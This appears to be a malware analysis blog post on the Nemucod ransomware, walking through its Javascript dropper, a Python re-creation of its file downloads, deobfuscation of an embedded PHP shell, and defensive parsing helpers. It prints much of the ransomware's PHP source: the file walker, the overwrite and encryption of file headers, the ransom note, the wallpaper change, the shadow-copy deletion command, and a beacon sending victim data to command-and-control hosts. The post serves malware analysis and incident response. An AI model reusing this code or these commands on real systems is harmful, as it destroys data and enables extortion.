The analysis in part II continues the analysis from the part I blog post. If you haven't had a chance to read through part I, I would highly encourage you to do so before going through part II; it gives you the information you need to understand the bigger picture of this attack vector. That said, I have attempted to make each part of the analysis stand on its own, so you don't have to rely on any previous part. In this blog post I cover the analysis of the Javascript output file that we deobfuscated in part I. This Javascript is the Nemucod ransomware; it contains many components and requires an entire blog post, as you will see below. I explain how additional files are downloaded and executed on the affected system by the Nemucod ransomware. Among these files are the Kovter binary and the PHP interpreter executable and DLL. The PHP interpreter is used by the ransomware to run an obfuscated PHP shell on the victim system, and the operation of this PHP shell is covered in three sections of this blog post. Finally, I include some indicators of compromise (IOCs) at the end of this report. Please note that I will also follow up with a part III blog post in the future with additional analysis.

Analysis of the Javascript Output File secondoutput.js (Nemucod Ransomware)

If you had a chance to read part I, you will recall that we obtained a new Javascript output file after changing the eval function to console.log and running the Javascript file with NodeJS. The MD5 hash of this new Javascript file is b2f688a305571215e4f3079af3b601ca. You can download this Javascript variant from the following online resources:

As mentioned, this Javascript belongs to the Nemucod ransomware. Once you open this new output file in a text editor you will immediately notice that the code is more complex in nature, because it performs all sorts of operations: downloading new files, running an obfuscated PHP shell, creating new files on the victim system and so on. Let's dissect this file to see exactly what it does. To do this properly, I break the analysis into three sections and explain each one separately, which makes it clearer what this Javascript does. The following describes what each section entails:

  • Section 1 – Additional Files Download and Execution
    • This section covers how additional binary files, including the Kovter malware, are downloaded onto the affected system.
  • Section 2 – Saving Obfuscated PHP Shell to File
    • In this section we decode the obfuscated shell and look at its main functionality.
  • Section 3 – Execution of the Obfuscated PHP Shell
    • This is where we see how the PHP shell is executed on the victim system.

Section 1 – Additional Files download and Execution

In this section let's focus on how the Javascript downloads the additional files. If you look at the content of this Javascript file in a text editor you should see the following section:

var ld = 0; 
var cs = String.fromCharCode(92); // the string value of the backslash character '\'
var cq = String.fromCharCode(34); // the string value of the double quote character '"'
var ll = ["","","","",""];        // the five download domains (redacted in this post)
var ws = WScript.CreateObject("WScript.Shell"); 
var fn = ws.ExpandEnvironmentStrings("%TEMP%")+cs+"157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2"; 
var pd = ws.ExpandEnvironmentStrings("%TEMP%")+cs+"php5.dll"; 
var xo = WScript.CreateObject("MSXML2.XMLHTTP"); 
var xa = WScript.CreateObject("ADODB.Stream"); 
var fo = WScript.CreateObject("Scripting.FileSystemObject"); 
if (!fo.FileExists(fn+".doc")) {  
   var fp=fo.CreateTextFile(fn+".doc",true);  
   for(var i=0; i<15020; i++) {  
      fp.Write(String.fromCharCode(Math.floor(Math.random()*64+20)));
   };
   // [lines missing from the original post]
   catch(er) {};  
   for (var n=2; n<=4; n++) {  
      for(var i=ld; i<ll.length;i++) {  
         var dn = 0;  
         try {  
            // [request line truncated in the original post; only its tail survives. The query
            //  string ends with the long token followed by n, and the trailing false most likely
            //  makes the xo.open() request synchronous]
            b691oiFy2rROgpkHr1JNjd3NQ"+n, false);  
            if(xo.status==200) {  
               if(xa.Size>10000) {  
                  // [file-saving code for n==2, n==3 and n==4 missing from the original post]
                  try { 
                  catch(er) {}; 
               } else if(n==3){ 
               } else if(n==4){ 
         }  catch(er) {};  
} else {  
  } catch(er) {}; 

Please note that I have added indentation to the code above to make it easier to review, read and understand what this section does. In a nutshell, the code above shows that upon execution the script downloads and creates the following files on the affected system:

  • 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.exe – PHP interpreter executable (normally named php.exe)
    • MD5: 7a962afc3d437a5046c3ade4ed6e2696
    • VirusTotal
  • 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj22.exe – The Kovter binary.
    • MD5: 83414daf0fdce7c2bf6f98ca57911a72
    • VirusTotal
    • More about this malware and its operation in the next blog post (part III).
  • php5.dll – PHP interpreter DLL. This DLL is imported by the PHP interpreter executable.
    • MD5: 91660c94f9f3283785febcb51cadba4c
    • VirusTotal

For example, the wscript.exe process (blog post part I explains how to execute the initial Javascript with the wscript.exe command) created the files php5.dll, 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.php and 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.exe when it was executed on my analysis system. Figure 1 shows this process:

Figure 1: The wscript process creating multiple files

The PHP shell file 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.php is covered in section 2 of this blog post.

To make things easier, I have converted the important parts of this section into a Python 3 script. The content of the script is listed below:

import sys
import requests

# The token sent in the query string; the file number (2, 3 or 4) is appended per request.
value1 = '000000157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj201075000MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAi78TzT4zY95ZcMDYUN3YozYlf3VsLMEEVLi0M9_EVLAsDOasmgUEv-dXrxE55WK8UX6lFV00U6PTwxMgIfJXmUEND6aoIZoPcpdjxoB99ZZZQqclA7R4eO24-OgMltMFrgUqATmP2G1VArMyi36muwh573z5ymtJ-p1TER9yekK0TtcNpZOSZ_hQXL-qHLqjtgrowHPENtjjBMDxffKGQmaU73Pkz3z35Z1qT29YADuwSvtW8fvC6mzUAr9rRXZlD-aNMjec6YSqlyzpWz5kNOoWu8mbyLI0jG6QaGEYxH60IpOc2b2fLnLw7ebN6bMRNvZWdDK4BQ98kcjvowEVLwIDAQABa51pzaa6WhRlOaAFY5es5ezP6KAlLpyAqe1RkSVFJiV-pIV-3ITa0CQz5dhBAPLjrA7S6nqsr4jvG0bcMb691oiFy2rROgpkHr1JNjd3NQ'
# The five compromised domains are redacted here; fill them in from the IOC list.
websites = ["", "", "", "", ""]
binaryfilename = '157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2'
phpfilename = "php5"

def output_name(enum):
    # Same file names the Javascript uses when it saves each download
    if enum == 2:
        return binaryfilename + str(enum) + ".exe"   # the Kovter malware
    if enum == 3:
        return binaryfilename + ".exe"               # the PHP interpreter (php.exe)
    return phpfilename + ".dll"                      # php5.dll, required by the interpreter

def main():
    for domain in websites:
        if not domain:
            continue
        print("Downloading from this domain: " + domain)
        # Starts at 2 and loops through 4, one request per file
        for enum in range(2, 5):
            try:
                # Perform the same GET request the Javascript sends to the compromised website
                response = requests.get('http://' + domain + '/counter?' + value1 + str(enum), timeout=15)
            except requests.RequestException as error:
                print(error)
                continue
            # The Javascript only keeps a 200 response that is larger than 10,000 bytes
            if response.status_code == 200 and len(response.content) > 10000:
                with open(output_name(enum), 'wb') as file1:
                    file1.write(response.content)

if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        sys.exit(1)

Feel free to copy and paste this Python script into your text editor, save it, and run it on your analysis system. However, before you decide to run the script, consider the following:

  1. Some security professionals don't like to communicate with remote domains/IP addresses, so as not to "tip off" the attackers. If you are one of them, that's fine; keep reading to see how to obtain these files another way.
  2. If you do decide to save this Python file and execute it, make sure the indentation is intact, because Python won't run without proper indentation. Don't worry, this script only downloads the files and doesn't execute them on your system.
  3. If you still want the files but don't want to download them directly onto your analysis system, you can download them from online resources such as Hybrid-Analysis, ReverseIT or Mlware: just search for the MD5 hash of each file. In addition, feel free to contact me and I will be glad to send you the files in a password-protected zip file.

In a nutshell, the Python script keeps five domains in the websites array. The script loops over each domain and attempts to download three files from it; the same three files are served by all five domains, so my assumption is that the five domains are fallbacks to ensure the script successfully obtains all three files required for this attack. For each file, the enumeration number (2, 3 or 4) is appended to the end of the long value1 token in the query string; this is how the compromised website knows which file to return for the GET request. In the Javascript, a response is saved only if the status is 200 and the body is larger than 10,000 bytes, and it is written to the file that corresponds to the enumeration number. If you look back at the Javascript code, you will also see that each file is created under the user's %TEMP% folder. Here are the variables I am referring to:

  • var fn = ws.ExpandEnvironmentStrings("%TEMP%")+cs+"157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2";
  • var pd = ws.ExpandEnvironmentStrings("%TEMP%")+cs+"php5.dll";
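The value1 token is not opaque: it is the campaign's own parameter block, and it leaks the bitcoin address and the RSA public key to anyone who can see the proxy logs. The following Python 3 code is an added example, not part of the original post, that splits a /counter request token (as the Javascript builds it, with the file index appended) into its fields and reads the key size straight from the DER header without any third-party library. The field layout (six zeros, a base58 address, an 8-digit field, a base64url SubjectPublicKeyInfo, a trailer, one index digit) is inferred from the single token on this page and from the command line in section 3, so treat it as an assumption; the same goes for the guess that the 8-digit field encodes the 0.1075 price. Note that inside the token the key is base64url encoded (- and _ instead of + and /), which is why it looks different from the key passed on the command line in section 3.

```python
import base64
import re

# The value1 token from the Python script above with the file index "3" appended, which is
# how the Javascript builds the /counter query string. This is the only token known from the
# post, so the field layout below is inferred from it and from the command line in section 3.
SAMPLE_TOKEN = (
    "000000157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj201075000"
    "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAi78TzT"
    "4zY95ZcMDYUN3YozYlf3VsLMEEVLi0M9_EVLAsDOasmgUEv-dXrxE55WK8UX6lFV00U6PTwxMgIfJXmUEND6aoIZoPcp"
    "djxoB99ZZZQqclA7R4eO24-OgMltMFrgUqATmP2G1VArMyi36muwh573z5ymtJ-p1TER9yekK0TtcNpZOSZ_hQXL-qHL"
    "qjtgrowHPENtjjBMDxffKGQmaU73Pkz3z35Z1qT29YADuwSvtW8fvC6mzUAr9rRXZlD-aNMjec6YSqlyzpWz5kNOoWu8"
    "mbyLI0jG6QaGEYxH60IpOc2b2fLnLw7ebN6bMRNvZWdDK4BQ98kcjvowEVLwIDAQAB"
    "a51pzaa6WhRlOaAFY5es5ezP6KAlLpyAqe1RkSVFJiV-pIV-3ITa0CQz5dhBAPLjrA7S6nqsr4jvG0bcMb691oiFy2rROgpkHr1JNjd3NQ"
    "3"
)

# six zeros, a base58 bitcoin address (base58 has no "0", so the address ends where the
# digits begin), an 8-digit field, then the key and the trailer
TOKEN_RE = re.compile(r"^000000([13][1-9A-HJ-NP-Za-km-z]{25,34})(\d{8})(MII.*)$")


def _der_tlv(buf, pos):
    """Minimal DER reader: (tag, value_start, value_end) of the element at pos."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, pos, pos + length


def rsa_spki_params(spki):
    """(modulus_bits, public_exponent) from a DER SubjectPublicKeyInfo carrying an RSA key."""
    _, seq_start, _ = _der_tlv(spki, 0)               # SubjectPublicKeyInfo ::= SEQUENCE
    _, _, alg_end = _der_tlv(spki, seq_start)         # AlgorithmIdentifier (skipped)
    tag, bits_start, _ = _der_tlv(spki, alg_end)      # subjectPublicKey BIT STRING
    if tag != 0x03 or spki[bits_start] != 0:
        raise ValueError("unexpected subjectPublicKey encoding")
    _, rsa_start, _ = _der_tlv(spki, bits_start + 1)  # RSAPublicKey ::= SEQUENCE
    _, n_start, n_end = _der_tlv(spki, rsa_start)     # modulus INTEGER
    _, e_start, e_end = _der_tlv(spki, n_end)         # publicExponent INTEGER
    modulus = int.from_bytes(spki[n_start:n_end], "big")
    exponent = int.from_bytes(spki[e_start:e_end], "big")
    return modulus.bit_length(), exponent


def parse_counter_token(token):
    """Split a /counter?<token> query value into the fields the dropper embeds in it."""
    m = TOKEN_RE.match(token)
    if not m:
        raise ValueError("not a token of the expected shape")
    address, price_field, rest = m.groups()
    # The key is unpadded base64url and runs straight into the trailer, so its length has to
    # be read from the DER header (30 82 LL LL ...) instead of from a delimiter.
    header = base64.urlsafe_b64decode(rest[:8])
    _, _, der_len = _der_tlv(header, 0)
    n_chars = -(-der_len * 4 // 3)                     # base64 characters for der_len bytes
    spki = base64.urlsafe_b64decode(rest[:n_chars] + "=" * (-n_chars % 4))
    bits, exponent = rsa_spki_params(spki)
    return {
        "address": address,
        "price_field": price_field,                    # "01075000"; assumed to encode the 0.1075 price
        "spki_b64": base64.b64encode(spki).decode(),   # standard base64, as seen on the command line
        "modulus_bits": bits,
        "public_exponent": exponent,
        "trailer": rest[n_chars:-1],
        "file_index": int(rest[-1]),
    }


def dropped_filename(address, file_index):
    """Name the Javascript saves download number file_index under in %TEMP% (section 1)."""
    return {2: address + "2.exe", 3: address + ".exe", 4: "php5.dll"}[file_index]


if __name__ == "__main__":
    info = parse_counter_token(SAMPLE_TOKEN)
    print(info["address"], info["modulus_bits"], dropped_filename(info["address"], info["file_index"]))
```

Run over a proxy log, parse_counter_token() gives you the campaign's bitcoin address and public key from the very first download attempt, before any file has been written to disk, and file_index tells you which of the three drops was being fetched.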

Although downloading these files is the main operation in the first section, the section also creates a document file, as you will see next.

Document Creation Process

There is one additional operation in section one: the creation of a document file. If you look at the Javascript code above, you will see the following line:

var fp=fo.CreateTextFile(fn+".doc",true);

The Javascript creates a document file filled with random characters. Nothing in the code shown here opens or executes that file afterwards. I have taken the required lines from the code and put them together below:

var cs = String.fromCharCode(92); // the string value of the backslash character '\'
var ws = WScript.CreateObject("WScript.Shell"); 
var fn = ws.ExpandEnvironmentStrings("%TEMP%")+cs+"157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2"; 
var fo = WScript.CreateObject("Scripting.FileSystemObject"); 
var fp=fo.CreateTextFile(fn+".doc",true); 
for(var i=0; i<15020; i++) {  
   // 15020 characters with codes 20 to 83 (control characters up to the letter 'S')
   fp.Write(String.fromCharCode(Math.floor(Math.random()*64+20)));
}
fp.Close();

Once again, this file is saved in the user's %TEMP% folder and filled with arbitrary characters. Please note that the script above only creates the file and doesn't execute anything on the system, so you can run it on your analysis system and try it yourself. Just copy and paste the code above, save it into a Javascript file and run it on a Windows system with the following command:

wscript docfunction.js

I named my file docfunction.js but you can name it whatever you want. Once you have executed this Javascript file, it creates the document file 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.doc in the following location: C:\Users\<username>\AppData\Local\Temp. Figure 2 shows an example of the wscript.exe process creating this document file in the user's temp folder:

Figure 2: The wscript process creating a document file

Please note that I have not had a chance to determine what this document file is used for in this attack. However, I am sure there is a reason for its creation, so I will cover it in the next blog post (part III).

Section 2 – Saving Obfuscated PHP Shell to File

If you look through the Javascript code you will see a large portion of obfuscated PHP code (about half way through the file) that looks like the following:

<?php eval(gzinflate(base64_decode(str_replace("+cq+"COMPAT_MODE"+cq+","+cq+"a"+cq+","+cq+"
[SNIP SNIP]
t4MeJeHK3//Bc="+cq+")))); ?>");

Please note that I have removed a large portion of the code (where the SNIP SNIP is) because it is very lengthy and I don't want this blog post to get out of hand in size. What we can see here is PHP code obfuscated with a string replacement function (str_replace), base64_decode and gzinflate, with the result finally executed (evaluated) with eval. We can also see the Javascript variable cq repeated several times inside the str_replace parentheses. Looking through the code, cq appears only at the very beginning and the very end of this large portion of PHP code, where it splices double quotes into the string. The variable's value is defined at the very beginning of the script:

var cq=String.fromCharCode(34);

Essentially, cq is the character with code 34, which is a double quote (").

Deobfuscating the PHP Shell

What we can do in this situation is perform a few manipulations on the code: replace each "+cq+" sequence with a double quote ("), change the eval function to echo, and then run the result through a PHP interpreter (similar to what we did in part I, running the Javascript via the node command). So let's go through the steps of making these changes:

  • Copy and paste the code portion from <?php eval(gzinflate(base64_decode(str_replace("+cq+"COMPAT_MODE"+cq+","+cq+"a"+cq+","+cq+"7H all the way to the end of the code K3//Bc="+cq+")))); ?> into a new file in a text editor and save it as evil.php (you can use any filename you want). To ensure that you performed this step correctly, the MD5 hash of this file should be d5b30d04cea5ef6069652590c64c873a. I uploaded the file to the following online resources for your convenience:
  • Now replace eval(gzinflate( with echo(gzinflate(.
  • Now, inside the str_replace function at the beginning, change "+cq+"COMPAT_MODE"+cq+","+cq+"a"+cq+","+cq+"7H... to "COMPAT_MODE","a","7H.... Look at figure 3 for an after-modification example to make sure you have made the same changes:

Figure 3: Beginning of the evil php file

  • At the very end of the PHP script, change K3//Bc="+cq+")))); ?> to K3//Bc=")))); ?>. Look at figure 4 for an after-modification example to make sure you have made the same changes:

Figure 4: End of the evil php file

  • Now save the output under whatever filename you want. I named it evil.php.

On a side note, the Javascript creates this PHP file in the user's %TEMP% folder under the name 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.php (refer to figure 1 for a visual example).

At this point we can run the new evil.php script through a PHP interpreter. To do this you will need PHP installed on your system. If you use Windows for analysis, download the PHP interpreter for Windows from the PHP download page. On a Mac or Linux system PHP may already be installed; otherwise there are plenty of online resources to guide you through installing it. Because eval was replaced with echo, the interpreter only decodes and prints the inner layer instead of executing it, but treat the output as hostile code all the same and do this on an isolated analysis system.

Ok, so let's run the modified evil.php through the PHP interpreter with the following command:

php -f evil.php > evil2.php

If you have done these steps properly, your new output file (in our case evil2.php) should have the MD5 hash 550ce19483757cd2cde1b74649d38d7e. I also uploaded this file to the following online resources for your convenience:
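If you would rather not feed attacker-controlled PHP to an interpreter at all, even with eval swapped for echo, the same unwrapping can be done statically. The following Python 3 code is an added example, not part of the original post: it undoes the "+cq+" quote splicing, applies the str_replace("COMPAT_MODE","a",...) trick to the blob, base64-decodes it and inflates it with raw DEFLATE (which is what PHP's gzinflate() expects), and repeats until no eval(gzinflate(base64_decode(...))) wrapper remains. The sample input is constructed by wrapping a harmless PHP snippet the same way, because the real blob is too large to reproduce here; the two-layer nesting is part of that construction, not a claim about the real sample.

```python
import base64
import re
import zlib

# eval(gzinflate(base64_decode(...))) with an optional str_replace("NEEDLE","REPL","BLOB")
# in the middle, as in this sample.
WRAPPER_RE = re.compile(
    r'eval\(gzinflate\(base64_decode\('
    r'(?:str_replace\("([^"]*)",\s*"([^"]*)",\s*)?"([^"]*)"\)?\)\)\);?'
)


def unwrap_layer(php_src):
    """Undo one eval(gzinflate(base64_decode(...))) wrapper; None if there is no wrapper."""
    m = WRAPPER_RE.search(php_src)
    if m is None:
        return None
    needle, repl, blob = m.groups()
    if needle is not None:
        blob = blob.replace(needle, repl)     # what the PHP str_replace() would do
    raw = base64.b64decode(blob)
    # PHP's gzinflate() takes raw DEFLATE data (RFC 1951), hence wbits = -15
    return zlib.decompress(raw, -15).decode("latin-1")


def deobfuscate(js_fragment, max_layers=10):
    """Remove the Javascript quote splicing, then peel wrappers until plain PHP remains."""
    php = js_fragment.replace('"+cq+"', '"')  # "+cq+" is how the script splices in a "
    layers = 0
    while layers < max_layers:
        inner = unwrap_layer(php)
        if inner is None:
            break
        php, layers = inner, layers + 1
    return php, layers


def wrap_layer(inner_php, needle=None, repl="a"):
    """Build one wrapper layer (constructed test data, the inverse of unwrap_layer)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(comp.compress(inner_php.encode("latin-1")) + comp.flush()).decode()
    if needle is None:
        return '<?php eval(gzinflate(base64_decode("%s"))); ?>' % blob
    blob = blob.replace(repl, needle)          # plant the needle where the blob had "a"
    return '<?php eval(gzinflate(base64_decode(str_replace("%s","%s","%s")))); ?>' % (needle, repl, blob)


def build_sample():
    """A harmless two-layer stand-in for the real blob, in the form found in the Javascript."""
    inner = '<?php echo "hello from layer 2"; ?>'
    outer = wrap_layer(wrap_layer(inner), needle="COMPAT_MODE")
    return outer.replace('"', '"+cq+"')        # the string glue seen in the .js file


if __name__ == "__main__":
    php, layers = deobfuscate(build_sample())
    print(layers, php)
```

Applied to the real fragment (copied from the first "+cq+" to the final ?>), deobfuscate() should return the same code that the php -f evil.php step prints, with no interpreter involved; the layer count tells you how many wrappers were stacked.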

Analysis of the Second Round PHP Output File Evil2.php

This PHP file has many commands, arguments and variables. In a nutshell, it is responsible for the following tasks:

  • Accepting command line arguments. You will see what those arguments are in section 3.
  • Running the ransomware functionality: encrypting files on the system with AES and wrapping each per-file AES key with an RSA public key. In section 3 you will see how the PHP file receives that public key.
  • Generating additional files, such as a wallpaper and an HTA ransom note telling the victim that his/her files are encrypted and giving a bitcoin address for the payment.
  • Communicating with the following remote domains: "", "", "", "", ""
  • Running Windows commands such as changing the wallpaper and deleting all existing shadow copies, to prevent the victim from restoring his/her files.

When you open the file in a text editor you may not be able to easily understand what it does without proper indentation and line breaks. Therefore, take a look at a clean, human-readable version of this file in the following online resource: unphp. Looking through the code you will see a lot of PHP library functionality at the beginning of the file (the phpseclib Crypt_AES and Crypt_RSA classes used below are bundled into the script) and other functions. About half way through, and all the way to the end, you will see the main functionality of this ransomware. I have pasted the most important part below, reindented for readability:

}
$lands = array("", "", "", "", "");
$address = $_SERVER["argv"][1];
$price = $_SERVER["argv"][2];
$keypub = $_SERVER["argv"][3];
$cs = chr(92);
$cq = chr(34);
$fn = substr($_SERVER["argv"][0], 0, -4);

function Tree($p) {
    $s = chr(92);
    if (preg_match("/" . $s . $s . "(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i", $p) || preg_match("/recycle/i", $p)) return;
    $dp = opendir($p);
    if ($dp === false) return;
    while ($o = readdir($dp)) if ($o != "." && $o != "..") {
        if (!is_writable($p . $s . $o)) chmod($p . $s . $o, 0777);
        if (is_dir($p . $s . $o)) {
            Tree($p . $s . $o);
        } elseif (preg_match("/[.](123|602|dif|docb|docm|dot|dotm|dotx|hwp|mml|odg|odp|ods|otg|otp|ots|ott|pot|potm|potx|ppam|ppsm|ppsx|pptm|sldm|sldx|slk|stc|std|sti|stw|sxc|sxd|sxm|sxw|txt|uop|uot|wb2|wk1|wks|xlc|xlm|xlsb|xlsm|xlt|xltm|xltx|xlw|xml|asp|bat|brd|c|cmd|dch|dip|jar|js|rb|sch|sh|vbs|3g2|fla|m4u|swf|bmp|cgm|djv|gif|nef|png|db|dbf|frm|ibd|ldf|myd|myi|onenotec2|sqlite3|sqlitedb|paq|tbk|tgz|3dm|asc|lay|lay6|ms11|ms11|crt|csr|key|p12|pem|qcow2|vmx|aes|zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i", $o)) {
            $_SERVER["files"][] = $p . $s . $o;
        }
    }
    closedir($dp);
}

$_SERVER["files"] = array();
$stat_drives = "";
for ($i = 67; $i <= 90; $i++) {
    if (is_dir(chr($i) . ":")) {
        $stat_drives .= chr($i);
        Tree(chr($i) . ":");
    }
}
$stat_files = count($_SERVER["files"]);
if ($stat_files > 0) {
    $db = fopen($fn . ".db", "w");
    foreach ($_SERVER["files"] as $file) {
        $fp = fopen($file, "r+");
        if ($fp === false) continue;
        $trash = "";
        for ($i = 0; $i < 2048; $i++) $trash .= chr(mt_rand(0, 255));
        $key = "";
        for ($i = 0; $i < 128; $i++) $key .= chr(mt_rand(0, 255));
        $aes = new Crypt_AES(CRYPT_AES_MODE_ECB);
        $aes->setKeyLength(128);
        $aes->setKey($key);
        $b = fread($fp, 2048);
        fseek($fp, 0);
        fwrite($fp, substr($trash, 0, strlen($b)));
        fclose($fp);
        $b = $aes->encrypt($b);
        $rsa = new Crypt_RSA();
        $key = $rsa->encrypt($key);
        fputs($db, $file . " " . base64_encode($key) . " " . base64_encode($b) . " ");
    }
    fclose($db);
    $hta = gzinflate(base64_decode("hVTBbtpAED0TKf8wtURPCU6iHiJqLDnYUlAJILAa5VSt7SFeZdlxd9ci9Os7XkBJVZScbM++nffm7fNG9/nDND4/i+6zJPXPPBkmi8V0Mk7yyXwGk3QUpNl4+bTIA3i3MEsesncrj5NZOn9c5UnO1Y14lRv5BwMIu5b5JJ9m8QEahftProdHzrt5+gTFc0mKzCgwWAXg8NWNgm0tHXexbqdwFKxJu8u12Ei1G8JPNJXQIuD952e9qL7+B2WZfQg3t81rECd5ns06yV+isL4+4JtT8CsPVwp21BqoqGw3qJ29gKYmR/yshBOFsGhB6ArI1WhAbhoyTmgHDRpLWihYS8WQLRoE1KXZNQ6rqDBxa6V+BgElbQqphZOkgdasxBDXl6vk8ubq263vnWSry+sbflfPZKSrN3YQhQ2L732sPq8RSKsdbMUOHIFB64h1+In2uqTtFop2BxV6cWQGsFDIc13AmpSiLfBkFpkEGzvc83a0pDoBvUjJeGxQuEPbO+lKkpoplUIHbAoOPa5QVL78bslhXDvHrcLQl8paSD2Qek3hfk+ocRuF7+B+e8g8ntgz3rHgqL9YTsZZP4Ziz2k/ZuOKUEfogG0Peexfx8JnjCvkgzhBye65ml0UVcX22v/Yo36SpststerHn1HMG+QIaOxiwJ4f7O9SoqR+4bPSe4sLQ1uL5gTVdDL78QFRr3ekSmmrFYnKx8u0+u30T+dkcOwQhf7cfe7ir7qwzfdDFPn7iVooheYt3NW7wg4505Y+3Cz/7YrouvKsh58L7Yuj5hDqKOyugP2d0N1HfwE="));
    $links = "";
    foreach ($lands as $land) $links .= "<div>http://" . $land . "/counter/?" . $address . "</div>";
    $hta = str_replace("<%PRICE%>", $price, $hta);
    $hta = str_replace("<%ADDRESS%>", $address, $hta);
    $hta = str_replace("<%LINKS%>", $links, $hta);
    $fp = fopen($fn . ".hta", "w");
    fputs($fp, $hta);
    $fp = fopen($_ENV["APPDATA"] . $cs . "Desktop" . $cs . "DECRYPT.hta", "w");
    fputs($fp, $hta);
    $fp = fopen($_ENV["USERPROFILE"] . $cs . "Desktop" . $cs . "DECRYPT.hta", "w");
    fputs($fp, $hta);
    fclose($fp);
    $bmp = gzinflate(base64_decode("[... base64 bitmap blob omitted ...]"));
    for ($i = 1000; $i < strlen($bmp); $i++) if (mt_rand(1, 100) < 10) $bmp[$i] = chr(mt_rand(1, 255));
    $fp = fopen($fn . ".bmp", "wb");
    fputs($fp, $bmp);
    fclose($fp);
    exec("reg add " . $cq . "HKCU" . $cs . "Control Panel" . $cs . "Desktop" . $cq . " /v Wallpaper /f /t REG_SZ /d " . $cq . $fn . ".bmp" . $cq);
    exec("RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters");
    exec("mshta.exe " . $cq . $fn . ".hta" . $cq);
    exec("vssadmin.exe Delete Shadows /All /Quiet");
}
foreach ($lands as $host) {
    file_get_contents("http://" . $host . "/counter/index.php?log=" . base64_encode(gzdeflate($address . ", " . $price . ", " . $keypub . ", " . md5($_ENV["COMPUTERNAME"] . ", " . $_ENV["USERNAME"] . ", " . $_ENV["OS"] . ", " . $_ENV["PROCESSOR_IDENTIFIER"]) . " " . $stat_drives . " " . $stat_files)));
}

In a nutshell, the code above enumerates every drive letter from C: to Z:, walks each drive with Tree() (skipping directories whose path contains \winnt, \windows, \program, \appdata, \temp and similar prefixes, plus anything with "recycle" in the path) and collects every file whose extension is on the long list in the regular expression. For each collected file it generates a random 2048-byte "trash" buffer and a random 128-byte key with mt_rand(), reads the first 2048 bytes of the file, overwrites those bytes in place with the trash, encrypts the bytes it read with AES in ECB mode (phpseclib's Crypt_AES with the key length set to 128 bits, so only the first 16 bytes of the random key are actually used), encrypts that key with Crypt_RSA, and appends the file path plus both ciphertexts (base64 encoded) to a ledger file named after the script, <name>.db, in %TEMP%. In other words, the encrypted data does not live in the victim's file at all: the file holds random junk, and the ciphertext of the original bytes lives only in the .db ledger, which makes that file essential evidence for any recovery attempt. Two things are worth noting: mt_rand() is not a cryptographically secure generator, and in the excerpt above no loadKey() call ever hands $keypub to the Crypt_RSA object (whether that happens elsewhere in the file is not visible here); $keypub is only visible in the final reporting request to the C2 domains. In section 3 you will see where the $keypub argument comes from. Towards the end of the script you can also see the HTA ransom note being written next to the script and onto the desktop and launched with mshta.exe, a registry modification that sets the wallpaper to a bitmap whose bytes past offset 1000 are randomly corrupted so that its hash differs on every victim (the message informing the victim that his/her files are encrypted; see figure 7), and the vssadmin command that deletes all shadow copies on the system:

exec("vssadmin.exe Delete Shadows /All /Quiet");
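For scoping an incident it helps to know exactly which files the walker above would touch and how to read the .db ledger it leaves behind. The following Python 3 code is an added example, not from the post or from the malware: it ports the two preg_match() filters in Tree() and parses ledger records of the form "<path> <base64 RSA-encrypted key> <base64 AES ciphertext> ". The sample paths and the sample ledger are constructed; the parser relies on every path produced by Tree() starting with a drive letter and a backslash (Tree() is seeded with "X:" and appends "\name"), which is how it copes with file names that contain spaces. The lengths in the sample ledger (a 256-byte RSA block, block-padded AES ciphertext) are assumptions about what phpseclib emits, not values taken from a real ledger.

```python
import base64
import re

# Python ports of the two preg_match() filters in Tree()
SKIP_DIR_RE = re.compile(
    r"\\(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)",
    re.I,
)
RECYCLE_RE = re.compile(r"recycle", re.I)
TARGET_EXTS = (
    "123|602|dif|docb|docm|dot|dotm|dotx|hwp|mml|odg|odp|ods|otg|otp|ots|ott|pot|potm|potx|ppam|ppsm|ppsx|pptm|"
    "sldm|sldx|slk|stc|std|sti|stw|sxc|sxd|sxm|sxw|txt|uop|uot|wb2|wk1|wks|xlc|xlm|xlsb|xlsm|xlt|xltm|xltx|xlw|xml|"
    "asp|bat|brd|c|cmd|dch|dip|jar|js|rb|sch|sh|vbs|3g2|fla|m4u|swf|bmp|cgm|djv|gif|nef|png|db|dbf|frm|ibd|ldf|myd|"
    "myi|onenotec2|sqlite3|sqlitedb|paq|tbk|tgz|3dm|asc|lay|lay6|ms11|ms11|crt|csr|key|p12|pem|qcow2|vmx|aes|zip|"
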